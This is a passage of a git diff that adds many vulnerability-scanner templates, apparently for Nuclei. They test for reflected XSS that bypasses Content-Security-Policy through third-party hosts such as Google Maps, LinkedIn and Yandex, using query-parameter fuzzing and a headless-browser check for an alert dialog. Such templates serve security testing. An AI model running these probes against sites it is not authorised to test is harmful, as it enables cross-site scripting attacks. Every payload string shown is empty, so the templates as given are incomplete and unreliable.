+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: kbcprod_service_now_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "kbcprod_service_now_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml
new file mode 100644
index 00000000000..898f7fda86f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: lghnh-mkt-prod1-adobe-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Adobe Campaign
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,adobe
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: lghnh_mkt_prod1_adobe_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "lghnh_mkt_prod1_adobe_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml
new file mode 100644
index 00000000000..cabb2a05c69
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: lijit-ap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Lijit AP
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,lijit
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: lijit_ap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "lijit_ap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml
new file mode 100644
index 00000000000..fd1f40c4978
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: linkedin-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via LinkedIn
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,linkedin
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: linkedin_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "linkedin_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml
new file mode 100644
index 00000000000..2f191e34b34
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: links-disqus-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Disqus Links
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,disqus
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: links_disqus_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "links_disqus_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml
new file mode 100644
index 00000000000..a61064620a5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: livechatinc-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via LiveChatInc API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,livechatinc
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: livechatinc_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "livechatinc_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml
new file mode 100644
index 00000000000..7ea006151c5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: lpsnmedia-accdn-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via LPSN Media
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,lpsnmedia
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: lpsnmedia_accdn_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "lpsnmedia_accdn_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml
new file mode 100644
index 00000000000..fc8c5c162f1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: lptag-liveperson-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via LivePerson Tag
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,liveperson
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: lptag_liveperson_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "lptag_liveperson_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml
new file mode 100644
index 00000000000..c8f2bbe166e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: m-media-amazon-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Amazon Media
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,amazon
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: m_media_amazon_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "m_media_amazon_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml
new file mode 100644
index 00000000000..fbabd40e60e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mango-buzzfeed-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via BuzzFeed Mango
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,buzzfeed
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: mango_buzzfeed_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "mango_buzzfeed_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml
new file mode 100644
index 00000000000..055a3aa3aa0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-api-ssl-google-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Maps API SSL
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: maps_api_ssl_google_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "maps_api_ssl_google_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml
new file mode 100644
index 00000000000..4adb60ce618
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-com-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Maps
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: maps_google_com_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "maps_google_com_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml
new file mode 100644
index 00000000000..763c3684728
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-de-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Maps DE
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: maps_google_de_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "maps_google_de_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml
new file mode 100644
index 00000000000..319b94460b2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-lv-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Maps LV
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: maps_google_lv_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "maps_google_lv_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml
new file mode 100644
index 00000000000..06669e312f2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-google-ru-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Maps RU
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: maps_google_ru_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "maps_google_ru_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..7963c3d4700
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: maps-googleapis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Maps API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: maps_googleapis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "maps_googleapis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml
new file mode 100644
index 00000000000..f93be9aad40
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: marketo-app-sjint-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Marketo App SJINT
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,marketo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: marketo_app_sjint_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "marketo_app_sjint_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..12967e9416e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mc-yandex-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex MC
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: mc_yandex_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "mc_yandex_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml
new file mode 100644
index 00000000000..04aa67fd4ea
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: meetup-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Meetup API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,meetup
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: meetup_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "meetup_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml
new file mode 100644
index 00000000000..90d56f30f7a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mi-huodong-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Mi Huodong
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,mi
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: mi_huodong_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "mi_huodong_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml
new file mode 100644
index 00000000000..9f9d9978605
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: microsoft-translator-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Microsoft Translator API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,microsoft
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: microsoft_translator_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "microsoft_translator_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml
new file mode 100644
index 00000000000..e421bc694ba
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: mixpanel-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Mixpanel API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,mixpanel
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: mixpanel_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "mixpanel_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml
new file mode 100644
index 00000000000..1ec82002902
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: nominatim-openstreetmap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via OpenStreetMap Nominatim
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,openstreetmap
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
